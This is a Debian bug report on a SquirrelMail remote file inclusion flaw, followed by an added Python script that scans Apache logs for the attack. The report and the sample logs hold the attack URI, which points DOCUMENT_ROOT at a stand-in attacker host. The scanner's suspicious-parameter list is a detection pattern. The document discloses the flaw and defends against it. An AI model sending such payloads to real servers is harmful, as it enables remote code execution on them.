Package: squirrelmail
Version: 1:1.2.6-1.4
Severity: grave
Justification: user security hole
Tags: security

An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg, /src/redirect.php?DOCUMENT_ROOT=http://evil.example.com). If register_globals and allow_url_fopen are on (they are by default in the stable php4) then functions/display_messages.php will include the attacker's script, allowing access as www-data.

There is a fix in version 1.48.2.1 of display_messages.php:
http://cvs.sourceforge.net/viewcvs.py/squirrelmail/squirrelmail/functions/display_messages.php?r1=1.48&r2=1.48.2.1

-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux okcomputer 2.4.29 #1 SMP Thu Jan 20 20:41:12 MST 2005 i686
Locale: LANG=en_CA, LC_CTYPE=en_CA

Versions of packages squirrelmail depends on:
ii  apache            1.3.26-0woody6  Versatile, high-performance HTTP s
ii  aspell            0.33.7.1.1-9    A more intelligent replacement for
ii  debconf           1.2.35          Debian configuration management sy
ii  ispell            3.1.20-21.1     International Ispell (an interacti
ii  perl              5.6.1-8.8       Larry Wall's Practical Extraction
ii  php4              4:4.1.2-7.0.1   A server-side, HTML-embedded scrip
ii  wwwconfig-common  0.0.19          Debian web auto configuration.
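Added example, not part of the bug report: a small Python scanner over Apache access-log lines that flags requests trying to supply DOCUMENT_ROOT (or any query parameter carrying a remote URL), the register_globals/allow_url_fopen pattern described above. The extra variable names in SUSPICIOUS_PARAMS and the sample log lines are assumed/constructed, and it generalizes beyond redirect.php to any script.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/NCSA combined-format line; only the request target is needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Names a client should never be allowed to set. DOCUMENT_ROOT is the one from the
# report; SCRIPT_FILENAME and PATH_TRANSLATED are assumed further examples of server
# variables that register_globals would let a request overwrite.
SUSPICIOUS_PARAMS = {"DOCUMENT_ROOT", "SCRIPT_FILENAME", "PATH_TRANSLATED"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def inspect_request(target):
    """Return (param, value, reasons) for each query parameter that names a
    server variable and/or carries a remote URL (the allow_url_fopen case).
    parse_qs percent-decodes, so an encoded 'http%3A%2F%2F' is caught too."""
    findings = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            reasons = []
            if name.upper() in SUSPICIOUS_PARAMS:
                reasons.append("client-supplied server variable")
            if value.lower().startswith(REMOTE_SCHEMES):
                reasons.append("remote URL in parameter")
            if reasons:
                findings.append((name, value, reasons))
    return findings


def scan_log(lines):
    """Parse access-log lines and return one alert dict per suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the scan
        for param, value, reasons in inspect_request(m.group("target")):
            alerts.append({"ip": m.group("ip"), "path": urlsplit(m.group("target")).path,
                           "param": param, "value": value, "reasons": reasons})
    return alerts


# Constructed sample log lines (not from the report); the second one is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jan/2005:20:41:12 -0700] "GET /src/redirect.php?DOCUMENT_ROOT=http://evil.example.com HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Jan/2005:20:42:01 -0700] "GET /src/read_body.php?mailbox=INBOX&passed_id=42 HTTP/1.1" 200 8192',
    '203.0.113.5 - - [20/Jan/2005:20:43:30 -0700] "GET /src/redirect.php?document_root=http%3A%2F%2Fevil.example.com%2F HTTP/1.0" 200 512',
]
```

Feed `scan_log` the lines of a real access log; on the sample above the first and third lines produce alerts, the benign read_body.php request none.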